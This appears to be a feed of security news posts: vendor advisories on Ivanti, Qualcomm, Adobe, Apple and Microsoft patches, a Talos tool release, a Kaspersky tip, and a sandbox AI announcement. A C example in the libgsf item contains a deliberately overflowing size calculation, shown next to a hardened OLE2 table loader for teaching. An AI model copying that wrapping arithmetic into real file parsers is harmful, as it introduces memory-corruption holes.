Ghidra data type archive for Windows driver functions

While reverse-engineering Windows drivers with Ghidra, it is common to encounter a function or data type that is not recognized during disassembly.

This is because Ghidra does not natively include the majority of the definitions for data types and functions used by Windows drivers.

Thankfully, these problems can usually be solved by importing Ghidra data type archive files (.gdt) that contain the relevant definitions.

However, it is not uncommon for the definitions in question to be missing from every preexisting .gdt file, in which case a new definition must be created manually. When the function or data type is also undocumented by Microsoft, creating that definition is more tedious still, since the prototype or structure layout has to be recovered from the binary itself rather than copied from a header.

To aid analysts reverse engineering Windows drivers, Cisco Talos is releasing a GDT file on GitHub containing definitions for functions and data types that our analysts created as needed while analyzing malicious drivers, because they were not present in the commonly used data type archives.

It is important to note that this archive is not intended to contain all undocumented Windows functions or serve as a replacement for other available data type archives, but as a supplement to them. This is a long-term project that will continue to grow when new definitions are created by our analysts and added to the public release.

The archive can be found here on our GitHub repository.

Cisco Talos Blog – Read More

CISA Issues Urgent Advisory on Critical Vulnerabilities in Ivanti Products

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory on vulnerabilities disclosed in multiple Ivanti products: Ivanti Endpoint Manager Mobile (EPMM), Ivanti Cloud Services Appliance (CSA), Ivanti Velocity License Server, Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Avalanche.

Ivanti's own advisory for the Cloud Services Appliance (CSA) states that a limited number of customers running CSA 4.6 patch 518 and earlier have been exploited by chaining CVE-2024-9379, CVE-2024-9380 or CVE-2024-9381 with CVE-2024-8963, an authentication-bypass issue that gives an unauthenticated attacker the admin-level access the other three require. CSA 4.6 is end-of-life, so the remediation for that branch is to upgrade to CSA 5.0.

Ivanti's advisory covers a range of vulnerabilities across its product lines, all requiring urgent attention.

Details of Ivanti Vulnerabilities

CVE-2024-7612, rated high with a CVSS score of 8.8, affects Ivanti EPMM (Core) 12.1.0.3 and earlier. It is an incorrect permission assignment that allows a local authenticated attacker to read or modify sensitive configuration files without authorization; the fix is EPMM 12.1.0.4.

CVE-2024-9379, rated medium with a CVSS score of 6.5, is a SQL injection in the admin web console of Ivanti CSA (Cloud Services Appliance) 5.0.1 and earlier that allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.

CVE-2024-9380, rated high with a CVSS score of 7.2, is an OS command injection in the same admin web console. A remote authenticated attacker with admin privileges can use it to run operating-system commands, i.e. obtain remote code execution on the appliance. Both CSA issues are fixed in CSA 5.0.2.

CVE-2024-37404, rated critical with a CVSS score of 9.1, affects both Ivanti Connect Secure and Ivanti Policy Secure: improper input validation in the admin portal lets a remote authenticated attacker with admin privileges achieve remote code execution. Note the common thread: every CSA and Connect Secure/Policy Secure issue here is reached through an administrative interface and needs admin access, which is exactly what CVE-2024-8963 supplies in the chain Ivanti observed.

A listing in CISA's Known Exploited Vulnerabilities (KEV) catalog means the vulnerability has been exploited in the wild, not merely that it could be, and for U.S. federal agencies it triggers a binding remediation deadline. Attackers use such flaws for initial access, data theft, ransomware deployment and privilege escalation.

Recommendations and Mitigations

To mitigate these risks effectively, organizations must take proactive measures, including:

Apply the vendor's patches: upgrade CSA to 5.0.2 (the 4.6 branch is end-of-life), EPMM to 12.1.0.4, and Connect Secure and Policy Secure to the fixed releases named in Ivanti's advisory.

Create a routine patch schedule that prioritizes critical patches and covers inventory management, patch assessment, testing, deployment and verification; automate it wherever possible for consistency.

Segment networks to isolate critical assets from less secure areas.

Reduce the attack surface: the CSA admin console and the Connect Secure/Policy Secure admin portal should be reachable only from trusted management networks, never directly from the internet, since every vulnerability above is reached through those interfaces.

Maintain an incident response plan with procedures for detecting, responding to and recovering from security incidents, and test and update it regularly against current threats.

Implement comprehensive monitoring to detect and analyze suspicious activity, and use a Security Information and Event Management (SIEM) system to aggregate and correlate logs for real-time detection and response. For CSA specifically, review the appliance for new or modified administrative users, since the observed chain begins with authentication bypass.

Conclusion

By adopting these strategies, organizations can reduce their vulnerability to exploitation and enhance their overall security posture. The proactive measures highlighted in this advisory are essential for protecting sensitive information and maintaining system integrity in an increasingly hostile internet. Immediate action is required to mitigate the risks posed by these vulnerabilities and ensure that organizational assets are safeguarded against potential threats.

The post CISA Issues Urgent Advisory on Critical Vulnerabilities in Ivanti Products appeared first on Cyble.

Blog – Cyble – Read More

Vulnerability in popular PDF reader could lead to arbitrary code execution; Multiple issues in GNOME project

Cisco Talos’ Vulnerability Research team recently disclosed six new security vulnerabilities across a range of software, including one in a popular PDF reader that could lead to arbitrary code execution. 

Foxit PDF Reader, one of the most popular alternatives to Adobe Acrobat, contains a memory corruption vulnerability that could allow an adversary to execute code on the targeted machine. 

Talos also discovered three vulnerabilities in Veertu’s Anka Build, a suite of software designed to test macOS or iOS applications in CI/CD environments.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Use-after-free vulnerability in Foxit PDF Reader

Discovered by KPC.

A use-after-free vulnerability in Foxit PDF Reader could lead to memory corruption and eventually arbitrary code execution on the targeted machine.

TALOS-2024-1967 (CVE-2024-28888) can be triggered if an adversary tricks a user into opening a specially crafted PDF that contains malicious JavaScript. Exploitation could also occur if the targeted user visits an attacker-controlled website with the Foxit PDF Reader browser extension enabled.

Multiple vulnerabilities in GNOME project library could lead to code execution

Two vulnerabilities in the G Structured File Library (libgsf) could lead to arbitrary code execution. 

This GNOME project library provides an abstraction layer over structured file formats such as .tar, .zip and OLE2 compound documents (the container format used by legacy Microsoft Office files, whose sector allocation table is the subject of the second issue below).

TALOS-2024-2068 (CVE-2024-36474) is an integer overflow vulnerability that could allow an out-of-bounds index to be used when reading and writing to an array. This could lead to arbitrary code execution if an adversary exploited it appropriately. 

TALOS-2024-2069 (CVE-2024-42415) works similarly, but in this case, it arises when the software processes the sector allocation table.

An adversary could exploit both these vulnerabilities by tricking the targeted user into opening a malicious, specially crafted file. 
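The integer-overflow-to-out-of-bounds-index pattern that both libgsf issues describe, shown on an OLE2 (MS-CFB) sector allocation table because that is the structure CVE-2024-42415 concerns. This is an added example written for this page; it is not libgsf's code and not Talos's proof of concept. The header offsets follow the MS-CFB v3 layout (512-byte sectors, the SAT sector count at 0x2C, the DIFAT array at 0x4C); the function names, the three checks and the sample file are constructed for illustration.

```c
/* Added example (not libgsf code): loading an MS-CFB/OLE2 sector allocation
 * table (SAT) from untrusted bytes. The vulnerable arithmetic is shown beside a
 * hardened loader. Offsets follow the MS-CFB v3 header (512-byte sectors). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SECTOR_SIZE         512u
#define ENTRIES_PER_SECTOR  (SECTOR_SIZE / 4u)
#define DIFAT_IN_HEADER     109u    /* SAT sector ids that fit in the header itself */
#define HDR_NUM_SAT_SECTORS 0x2Cu   /* uint32: number of SAT sectors the file claims */
#define HDR_DIFAT           0x4Cu   /* uint32[109]: where those SAT sectors live */
#define ENDOFCHAIN          0xFFFFFFFEu

static uint32_t rd_u32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr_u32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Vulnerable pattern: the table size is computed in 32-bit arithmetic straight
 * from the header count. For any count >= 2^23 the product wraps, the allocation
 * that follows is far too small, and a copy loop driven by the original count
 * writes past it. Only the arithmetic is reproduced; the out-of-bounds write is
 * deliberately not executed. */
uint32_t vuln_table_bytes(uint32_t num_sat_sectors) {
    return num_sat_sectors * SECTOR_SIZE;
}

typedef struct { uint32_t *entries; size_t count; } sat_t;

/* Hardened loader: returns 0 and fills *out, or -1 for malformed input. */
int load_sat(const uint8_t *file, size_t file_len, sat_t *out) {
    if (file_len < SECTOR_SIZE) return -1;                 /* header incomplete */
    size_t total_sectors = (file_len - SECTOR_SIZE) / SECTOR_SIZE;
    uint32_t n = rd_u32(file + HDR_NUM_SAT_SECTORS);

    /* 1. Bound the count by what the file can physically contain. */
    if (n > total_sectors || n > DIFAT_IN_HEADER) return -1;
    /* 2. Check the multiplication before doing it, in size_t. Redundant after
     *    check 1 here, but it is the check that matters when the count is not
     *    otherwise bounded. */
    if (n > SIZE_MAX / SECTOR_SIZE) return -1;
    size_t bytes = (size_t)n * SECTOR_SIZE;

    uint32_t *entries = malloc(bytes ? bytes : 1);
    if (!entries) return -1;

    for (uint32_t i = 0; i < n; i++) {
        uint32_t sid = rd_u32(file + HDR_DIFAT + 4u * i);
        /* 3. Every sector id read from the file is an index: bound it first. */
        if (sid >= total_sectors) { free(entries); return -1; }
        const uint8_t *sec = file + SECTOR_SIZE * (1u + (size_t)sid); /* header is "sector -1" */
        for (uint32_t j = 0; j < ENTRIES_PER_SECTOR; j++)
            entries[(size_t)i * ENTRIES_PER_SECTOR + j] = rd_u32(sec + 4u * j);
    }
    out->entries = entries;
    out->count   = (size_t)n * ENTRIES_PER_SECTOR;
    return 0;
}

/* Constructed sample file: a header plus two data sectors, with one SAT sector
 * whose first two entries form the chain 1 -> ENDOFCHAIN. Returns byte length. */
size_t build_sample(uint8_t *buf, size_t cap, uint32_t claimed_sat_sectors, uint32_t first_sid) {
    size_t len = SECTOR_SIZE * 3;
    if (cap < len) return 0;
    memset(buf, 0, len);
    wr_u32(buf + HDR_NUM_SAT_SECTORS, claimed_sat_sectors);
    wr_u32(buf + HDR_DIFAT, first_sid);
    wr_u32(buf + SECTOR_SIZE + 0, 1u);
    wr_u32(buf + SECTOR_SIZE + 4, ENDOFCHAIN);
    return len;
}

/* Three scenarios, each returning 1 when the loader behaved as intended. */
int check_well_formed(void) {
    uint8_t buf[SECTOR_SIZE * 3]; sat_t sat;
    size_t len = build_sample(buf, sizeof buf, 1u, 0u);
    if (load_sat(buf, len, &sat) != 0) return 0;
    int ok = sat.count == ENTRIES_PER_SECTOR && sat.entries[0] == 1u && sat.entries[1] == ENDOFCHAIN;
    free(sat.entries);
    return ok;
}
int check_wrapping_count(void) {      /* 2^23 * 512 wraps to 0 in uint32_t */
    uint8_t buf[SECTOR_SIZE * 3]; sat_t sat;
    size_t len = build_sample(buf, sizeof buf, 0x00800000u, 0u);
    return vuln_table_bytes(0x00800000u) == 0u && load_sat(buf, len, &sat) == -1;
}
int check_bad_sector_id(void) {       /* id 7 lies beyond the two sectors present */
    uint8_t buf[SECTOR_SIZE * 3]; sat_t sat;
    size_t len = build_sample(buf, sizeof buf, 1u, 7u);
    return load_sat(buf, len, &sat) == -1;
}

int main(void) {
    printf("well-formed: %d\nwrapping count rejected: %d\nbad sector id rejected: %d\n",
           check_well_formed(), check_wrapping_count(), check_bad_sector_id());
    return 0;
}
```

The three checks are the whole fix: a count that exceeds what the file can contain is rejected before any arithmetic, the multiplication is validated in the allocation's own width rather than in uint32_t, and every sector id pulled from the file is treated as an untrusted index and bounded before it is dereferenced. A parser that does only the first of these is still exposed to a crafted DIFAT entry.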

Three vulnerabilities in Veertu Anka Build

Discovered by KPC.

Veertu’s Anka Build software contains three vulnerabilities, two of which are directory traversal issues. 

Anka Build is a suite of software designed to test macOS and iOS applications in CI/CD environments. The suite is a centralized dashboard for managing nodes, VM instances, templates, tags and logs. 

This software contains two directory traversal vulnerabilities — TALOS-2024-2059 (CVE-2024-41163) and TALOS-2024-2061 (CVE-2024-41922) — that could lead to the disclosure of arbitrary files. An adversary could exploit these vulnerabilities by sending the target a specially crafted HTTP request. 

Another vulnerability, TALOS-2024-2060 (CVE-2024-39755), is a privilege escalation issue that could allow a low-privileged user to force the software to update, potentially raising their access to that of a root user. 

Cisco Talos Blog – Read More

OEMs Are Urged to Address Vulnerabilities in Device Communication

Overview

Qualcomm has published its October 2024 Security Bulletin, covering multiple vulnerabilities. Google's Threat Analysis Group has also reported that one of them, CVE-2024-43047, is being exploited in limited, targeted attacks. The flaw is a use-after-free in the FastRPC driver, the DSP-services component that brokers calls between the application processor and Qualcomm's DSPs; Qualcomm rates it High (CVSS 7.8). A local attacker who can reach the driver can use it to corrupt kernel memory and escalate privileges, which is why it matters as one link in a spyware-style exploit chain rather than as a direct route to user data.

Original equipment manufacturers (OEMs) have received patches for this flaw and are strongly encouraged to ship them without delay. Users concerned about the implications of this vulnerability should contact their device manufacturer for specific patch details and guidance.

Google has publicly acknowledged the contributions of various researchers who have been instrumental in identifying and reporting several critical security flaws. Among these notable contributions is CVE-2024-33066, identified by Claroty Research in partnership with Trend Micro. This collaboration highlights the importance of teamwork in discovering and mitigating potential threats.

Another key vulnerability, CVE-2024-21455, was reported by Seth Jenkins from Google Project Zero, demonstrating the ongoing commitment of researchers to enhance security measures across various platforms. Additionally, Xiling Gong identified CVE-2024-38399, further contributing to the collective knowledge needed to protect users against cybersecurity threats.

Most prominently, CVE-2024-43047 was brought to light by a team that included Seth Jenkins, Conghui Wang, and the Amnesty International Security Lab.

Overview of Vulnerabilities and Patches

Recent vulnerability assessments have revealed a concerning mix of high- and moderate-impact vulnerabilities across proprietary and open-source software. Understanding the nature and severity of these vulnerabilities is critical for grasping their potential impact on device security.

Among the high-impact vulnerabilities, CVE-2024-33066, associated with the WLAN Resource Manager, stands out. This critical flaw was reported on September 6, 2023, and has been assigned a CVSS score of 9.8, indicating its severe nature. Another vulnerability is CVE-2024-21455, related to the DSP Service. Reported on June 11, 2024, it carries a high-security rating with a CVSS score of 8.0.

Moderate impact vulnerabilities have also been identified, including CVE-2024-23375, which relates to the Radio Interface Layer. This issue was flagged on November 27, 2023, and is rated medium with a CVSS score of 5.5. Another moderate vulnerability, CVE-2024-38425, related to performance, was reported on January 23, 2024.

A detailed analysis of critical vulnerabilities reveals specific challenges that need to be addressed. For instance, CVE-2024-33064 involves a buffer over-read in WLAN host communication, which could allow for information disclosure during data transmission. Another vulnerability, CVE-2024-33069, is characterized as a “Use After Free” issue that can lead to a transient denial of service, disrupting communication between devices. Additionally, CVE-2024-38399 highlights a similar “Use After Free” vulnerability in graphics processing, which can result in memory corruption and negatively impact device functionality.

Moreover, vulnerabilities related to multimedia and power management integrated circuits (ICs) require attention, as they pose risks to device integrity and user privacy.

Conclusion

The ongoing battle against cybersecurity threats requires a collective effort from researchers, manufacturers, and users alike. As the in-the-wild exploitation of CVE-2024-43047 reported by Google's Threat Analysis Group demonstrates, proactive measures and timely patch deployment are key to maintaining secure systems.

Recommendations and Mitigations

Users should stay informed about vulnerabilities affecting their devices.

Regular updates and patch installations are crucial for mitigating risks associated with known vulnerabilities.

Engaging with device manufacturers for patch information is essential.

Timely updates can significantly reduce the potential for exploitation.

Manufacturers must prioritize the deployment of patches.

Quick implementation of security measures protects end-users.

Prompt action also upholds manufacturers’ reputations in a security-conscious market.

The post OEMs Are Urged to Address Vulnerabilities in Device Communication appeared first on Cyble.

Blog – Cyble – Read More

Security Updates for Adobe FrameMaker: Addressing Critical Vulnerabilities

Overview

Adobe has released updates for several of its products, including Adobe FrameMaker, Adobe Substance 3D Printer, Adobe Commerce and Magento Open Source, Adobe Dimension, Adobe Animate, Adobe Lightroom, Adobe InCopy, Adobe InDesign, and Adobe Substance 3D Stager. The updates, also flagged by the Cybersecurity and Infrastructure Security Agency (CISA), address critical vulnerabilities that could allow an attacker to execute arbitrary code on affected systems. Adobe has stated that it is not aware of any exploitation in the wild, but the potential impact warrants prompt patching.

The vulnerabilities identified impact various versions of Adobe products, specifically those running on Windows platforms. For Adobe FrameMaker, the affected versions include FrameMaker 2020 Release: Update 6 and earlier, as well as FrameMaker 2022 Release: Update 4 and earlier. Adobe Substance 3D Printer is also affected, with versions 1.0.3 and earlier being vulnerable.

Additionally, Adobe Commerce and Magento Open Source have vulnerabilities in Magento Open Source 2.4.6-p1 and earlier, as well as Magento Open Source 2.4.5-p2 and earlier. For Adobe Dimension, versions 3.4.2 and earlier are impacted. Adobe Animate has vulnerabilities in version 23.0.0 and earlier, while Adobe Lightroom users should be aware that Lightroom Classic 12.3 and earlier are also affected. Furthermore, Adobe InCopy and Adobe InDesign have vulnerabilities in their 2023 Release: Update 4 and earlier versions. Finally, Adobe Substance 3D Stager users should note that version 2.2 and earlier are at risk.

Adobe has classified these updates with a priority rating of 3, highlighting the need for users to take action. For mitigation against potential attacks, users are encouraged to update their installations to the latest versions. For Adobe FrameMaker, users should upgrade to FrameMaker 2020 Update 7 or FrameMaker 2022 Update 5. The recommended version for Adobe Substance 3D Printer is 1.0.4 or later. Users of Adobe Commerce and Magento Open Source should update to Magento Open Source 2.4.6-p2 or later.

For those using Adobe Dimension, the update to version 3.4.3 or later is recommended. Adobe Animate users should upgrade to version 23.0.1 or later. Adobe Lightroom Classic users need to move to version 12.4 or later. InCopy users should update to the 2023 Release: Update 5, and InDesign users are advised to upgrade to the 2023 Release: Update 5 as well. Finally, for Adobe Substance 3D Stager, users should update to version 2.3 or later.

Vulnerability Details and Acknowledgments

In Adobe FrameMaker, the first vulnerability is an Out-of-Bounds Read (CWE-125) that could lead to arbitrary code execution; Adobe rates it critical, with a CVSS base score of 7.8 (CVE-2024-47421). The second is an Untrusted Search Path (CWE-426), which also allows arbitrary code execution and shares the same CVSS base score and severity (CVE-2024-47422). Unlike the memory-safety issues in this set, an untrusted search path is exploited by planting a library or executable where the application looks for it first, so the attacker needs write access to a location on that path.

The third vulnerability involves the Unrestricted Upload of Files with Dangerous Type (CWE-434), which again could allow for arbitrary code execution, rated as critical with a CVSS base score of 7.8 (CVE-2024-47423). Another critical risk is associated with Integer Overflow or Wraparound (CWE-190), which can also lead to arbitrary code execution, rated with the same CVSS score (CVE-2024-47424). Lastly, Integer Underflow (Wrap or Wraparound) (CWE-191) is another critical vulnerability allowing arbitrary code execution, also carrying a CVSS base score of 7.8 (CVE-2024-47425).

The presence of these vulnerabilities across widely used Adobe products poses risks for users. Arbitrary code execution could allow attackers to gain control of affected systems, leading to unauthorized access to sensitive data, data breaches, or other forms of exploitation. Prompt updates to the latest software versions are essential in protecting user systems from such threats.

Adobe has expressed gratitude to the security researchers and organizations that have collaborated to identify and analyze these vulnerabilities. The individuals who have been instrumental in reporting the relevant issues include yjdfy, who reported CVE-2024-47424 and CVE-2024-47425; Sidhu (someonealt-86), who reported CVE-2024-47423; jony_juice, who reported CVE-2024-47422; and Francis Provencher (prl), who reported CVE-2024-47421. 

Conclusion

The vulnerabilities addressed in the recent updates highlight the collective effort required to create a more secure environment. By remaining vigilant and proactive in applying updates and adhering to best practices, users can contribute to protecting their systems and data from online threats.

Recommendations and Mitigations

To mitigate these vulnerabilities, Cyble recommends the following:

Regularly monitor security bulletins and subscribe to newsletters for timely information on vulnerabilities and updates.

Promptly applying patches can mitigate risks associated with known vulnerabilities.

Contact the vendor for clarification on updates and security measures where needed.

Organizations utilizing Adobe products should educate employees about cybersecurity best practices.

Continuously monitor systems for unusual activity to identify potential exploits before they escalate.

Implement additional security measures, such as firewalls and antivirus software, to further safeguard sensitive information.

The post Security Updates for Adobe FrameMaker: Addressing Critical Vulnerabilities appeared first on Cyble.

Blog – Cyble – Read More

Authentication codes from a service you don’t have an account with | Kaspersky official blog

We’ve previously covered what to do if you receive an unexpected one-time login code for one of your accounts (spoiler alert: it’s probably a hacking attempt, and it’s time to consider getting reliable protection for all your devices).

But sometimes the situation is different: you get a two-factor authentication code for a service where you’ve never had an account. In this post, we’ll discuss why this might happen, and how to react to such messages.

Why you might receive a code for an unknown account

There are two basic explanations for receiving one-time login codes for an account you’re certain doesn’t belong to you.

The first and most likely explanation: before you got your current phone number, it belonged to someone else. When they canceled their service, the number went back into circulation and eventually landed with you. This is called “phone number recycling” — a standard practice for mobile service providers.

Thus, the previous owner of your number registered an account using it. And now, either they’re trying to log in, or someone else is attempting to hack their account. As a result, one-time login codes are being sent to the number (which now belongs to you).

The less likely scenario is that someone is unintentionally trying to register an account using your phone number. Perhaps they mistyped their own number, or simply entered a random sequence of digits that happened to be yours.

What to do

No matter which of the above scenarios may have occurred, the good news is it’s not your problem. You don’t need to do anything and there’s nothing to worry about — unless you plan on creating an account with that service. If you do, you might run into a problem: your number is already associated with an existing (albeit abandoned) account. In that case, contact the service’s support team and explain the situation, and ask them to detach the unknown account from your number while mentioning that you’re a potential new customer.

If support can’t or won’t help, there’s nothing you can do except get an extra SIM card and link your account to the new number.

What NOT to do

Now, let’s talk about what you absolutely should not do: under no circumstances should you attempt to use the one-time codes you receive to access an account that doesn’t belong to you. Curiosity killed the cat, and in this case it could have serious consequences.

Accessing someone else's account isn't just unethical; it's illegal in most jurisdictions. In the U.S. it falls under the very strict Computer Fraud and Abuse Act (CFAA, 18 U.S.C. § 1030); in Germany under Section 202a of the Criminal Code (§ 202a StGB, data espionage); and the list goes on for most if not all countries worldwide. Although the probability of facing legal consequences for accessing someone else's account may not be high, it's not worth the risk.

Keep in mind that this probability increases significantly if the account is linked to illegal activity. In that case, law enforcement might take a keen interest in anyone who accesses the account, and sooner or later you could find yourself facing some very uncomfortable questions.

So, the best course of action when receiving a text message with a one-time login code for an account that doesn’t belong to you is to simply ignore it. And to avoid any unnecessary trouble, absolutely do not try to log in to someone else’s account.

Kaspersky official blog – Read More

Private AI Assistant for Malware Analysis in ANY.RUN Sandbox

We are excited to announce the release of an updated AI assistant, which brings powerful analysis capabilities right to your private sessions in the ANY.RUN sandbox. With our new assistant, we’ve taken things to the next level by combining deep, insightful analysis with the privacy and security you need. 

AI Reports Are Now Available for Private Sessions 

Previously, our AI assistant (powered by ChatGPT) was only accessible in public sandbox sessions. Now, it has been replaced with a new AI model fully hosted on our own infrastructure, allowing Hunter and Enterprise users to enjoy AI insights securely in private mode as well.

AI reviews inside ANY.RUN’s sandbox analysis session

With the updated version, you get detailed insights without any risk of your information being shared with third parties. Everything stays within your private session, so you can confidently analyze sensitive files and links with full privacy.

How AI Assistant Helps with Malware Analysis 

Inside ANY.RUN’s sandbox, you’ll now find the AI button next to processes, Suricata rules, as well as other key elements in your analysis session.  

Click the AI button next to processes, events, and other elements to generate AI reports

By clicking the AI button, you can get detailed insights about what each element does in that specific context. This feature is designed to give you a clearer understanding of malicious behavior, speeding up your investigations and providing helpful summaries in real time. 

Here’s what AI assistant can do for you: 

1. Process trees: The AI assistant digs into the process tree, identifies suspicious behavior and offers summaries of each process, helping users focus on critical areas of interest. 

Analysis of processes by AI

2. Command line: It scans command line inputs, pinpointing potential indicators of malicious activity, and generates a detailed report to guide your investigation. 

Command line analyzed by AI

3. Suricata rule triggers: When Suricata rules are triggered, the AI assistant provides a clear explanation of what these triggers mean in the context of your security, helping you understand the potential threat level. 

Suricata rule analyzed by AI assistant

4. HTTP connections: The assistant reviews HTTP connections, summarizing any suspicious behaviors or connections that may pose a risk to your network. 

HTTP requests analyzed by AI

5. Registry changes: The assistant flags unusual changes in the system registry, highlighting actions that could signal a malware threat. 

Registry changes analyzed by AI inside ANY.RUN

AI Summary Button: A Quick Threat Overview at Your Fingertips 

After analyzing various elements inside the session with AI, you can view all the generated reports conveniently through the AI Summary button.

You can find the AI Summary button in the top right corner of your sandbox session

This button, located in the top right corner of your ANY.RUN sandbox session, compiles all the AI reviews you’ve generated for processes, Suricata rules, and other components.

By clicking the AI Summary button, you get a quick and comprehensive overview of your analysis in one place, making it easy to see everything the AI has helped you review and understand during the session. 

Conclusion

With the addition of the AI assistant in private mode, you can benefit from AI-driven insights, summaries, and explanations while ensuring that your sensitive data remains completely protected.

See more recent updates from ANY.RUN in the September 2024 release notes.

About ANY.RUN    

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

Detect malware in seconds

Interact with samples in real time

Save time and money on sandbox setup and maintenance

Record and study all aspects of malware behavior

Collaborate with your team 

Scale as you need

The post Private AI Assistant for Malware Analysis in ANY.RUN Sandbox appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Largest Patch Tuesday since July includes two exploited in the wild, three critical vulnerabilities

The largest Microsoft Patch Tuesday since July includes two vulnerabilities that have been exploited in the wild and three other critical issues across the company’s range of hardware and software offerings.  

October’s monthly security update from Microsoft includes fixes for 117 CVEs, the most in a month since July’s updates covered 142 vulnerabilities.   

The two vulnerabilities that Microsoft reports have been actively exploited in the wild and are publicly known are both rated as only being of “moderate” severity.  

CVE-2024-43572 is a remote code execution vulnerability in the Microsoft Management Console that could allow an attacker to execute arbitrary code on the targeted machine. Microsoft’s security update will prevent untrusted Microsoft Saved Console (MSC) files from being opened to protect users against adversaries trying to exploit this vulnerability.  

The other vulnerability that was exploited in the wild in this week’s security update is CVE-2024-43573, a platform spoofing vulnerability in Windows MSHTML. Platform spoofing vulnerabilities usually allow an adversary to gain unauthorized access to an environment by disguising themselves as a trusted source.  

CVE-2024-43583, an elevation of privilege vulnerability in Winlogon, has also been publicly disclosed, according to Microsoft, but has not yet been exploited in the wild. This vulnerability could allow an attacker to obtain SYSTEM-level privilege. In addition to applying the patch, Microsoft also recommends users enable a Microsoft first-party Input Method Editor (IME) on their devices to prevent adversaries from being able to exploit third-party IMEs during the sign-in process. 

October’s Patch Tuesday also includes three critical vulnerabilities that could all lead to remote code execution. 

CVE-2024-43468 is the most serious of this bunch, with a CVSS severity score of 9.8 out of 10. An attacker could exploit this vulnerability in Microsoft Configuration Manager to execute commands on the targeted server or underlying database. 

Another remote code execution vulnerability, CVE-2024-43488, exists in the Visual Studio Code extension for Arduino, an open-source platform for building and programming single-board microcontroller projects. Missing authentication for a critical function could allow an adversary to execute code remotely over the network.  

Microsoft stated that the company has already mitigated this vulnerability and users do not need to take any additional steps. This extension has also been deprecated and can no longer be downloaded from the internet. 

Lastly, CVE-2024-43582 exists in the Windows Remote Desktop Protocol server and could allow an attacker to execute code on the server side with the same permissions as the RPC service. An adversary could exploit this vulnerability by sending malformed packets to an RPC host. However, exploitation also requires that the adversary win a race condition first.  

Cisco Talos would also like to highlight several vulnerabilities that are only rated as “important,” but Microsoft lists as “more likely” to be exploited: 

CVE-2024-43502: Elevation of privilege vulnerability in Windows Kernel

CVE-2024-43509 and CVE-2024-43556: Elevation of privilege vulnerabilities in Windows Graphics Component

CVE-2024-43560: Elevation of privilege vulnerability in Windows Storage Port

CVE-2024-43581 and CVE-2024-43615: Remote code execution vulnerabilities in Microsoft OpenSSH for Windows

CVE-2024-43609: Spoofing vulnerability in Microsoft Office

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 64083 – 64086, 64089, 64090, 64111 and 64112. There are also Snort 3 rules 301034 – 301036 and 301041.

Cisco Talos Blog

Apple Issues Urgent Security Advisory for iOS and iPadOS Vulnerabilities

Overview

Apple has released a new security advisory covering issues in its iOS and iPadOS platforms. As detailed in the advisory, two vulnerabilities have been identified, both of which affect iOS and iPadOS up to version 18.0, and Apple has released patches for both.

The first vulnerability, CVE-2024-44204, relates to information disclosure and has been assigned a CVSSv3.1 score of 5.5, indicating a medium severity level. This vulnerability allows saved passwords to be read aloud by the VoiceOver feature, posing a significant privacy risk for users on affected iOS and iPadOS versions. A patch is available for this vulnerability.

The second vulnerability, CVE-2024-44207, also relates to information disclosure, with a CVSSv3.1 score of 4.3, again indicating medium severity. This issue affects audio messages in the Messages app, enabling a few seconds of audio capture before the microphone indicator activates. Such a flaw could result in unintended recordings. A security patch for this vulnerability is also available.

Apple has indicated that security updates addressing these vulnerabilities are included in the recent releases of iOS 18.0.1 and iPadOS 18.0.1.

Patch Details and Impact

The updates were released on October 3, 2024, and they specifically target a range of Apple devices. The vulnerability CVE-2024-44207 affects all iPhone 16 models, while CVE-2024-44204 impacts several devices, including the iPhone XS and later models, as well as various iPad Pro models (specifically the 13-inch and 12.9-inch 3rd generation and later), the iPad Air (3rd generation and later), and the iPad mini (5th generation and later).

Apple emphasizes the critical importance of security and maintains a policy of not disclosing details about vulnerabilities until a thorough investigation has been completed and patches are available. To enhance transparency, the vulnerabilities are referenced by their CVE IDs in Apple’s official documentation.

In a statement concerning the security content of the updates, Apple noted, “About the security content of iOS 18.0.1 and iPadOS 18.0.1. This document describes the security content of the updates.”

Historically, Apple products have been prime targets for cybercriminals who exploit vulnerabilities for various motives, including espionage and financial gain. The recent vulnerabilities discovered in iOS and iPadOS versions put sensitive user information at risk, highlighting the urgent need for immediate patching to protect against potential exploits.

Conclusion

The vulnerabilities identified in Apple’s iOS and iPadOS are a stark reminder of the evolving cybersecurity landscape. As cyber threats become increasingly sophisticated, users must prioritize the application of security patches to protect their sensitive information.

Recommendations and Mitigations

To mitigate the risks associated with these vulnerabilities, users are strongly advised to:

Regularly check for and install the latest security updates from Apple to ensure your devices are protected against known vulnerabilities.

Activate automatic updates on your devices to ensure that you receive security patches as soon as they are released, minimizing the risk of exposure.

Regularly review the permissions granted to apps, particularly those that access sensitive information, to ensure they align with your privacy preferences. 

Keep an eye on the activity logs and alerts on your devices for any unusual access or behavior that could indicate a breach.

Take advantage of built-in security features such as Face ID, Touch ID, and two-factor authentication to enhance the protection of your devices.

The post Apple Issues Urgent Security Advisory for iOS and iPadOS Vulnerabilities appeared first on Cyble.

Blog – Cyble

MisterioLNK: The Open-Source LNK Loader Builder Behind Malicious Loaders

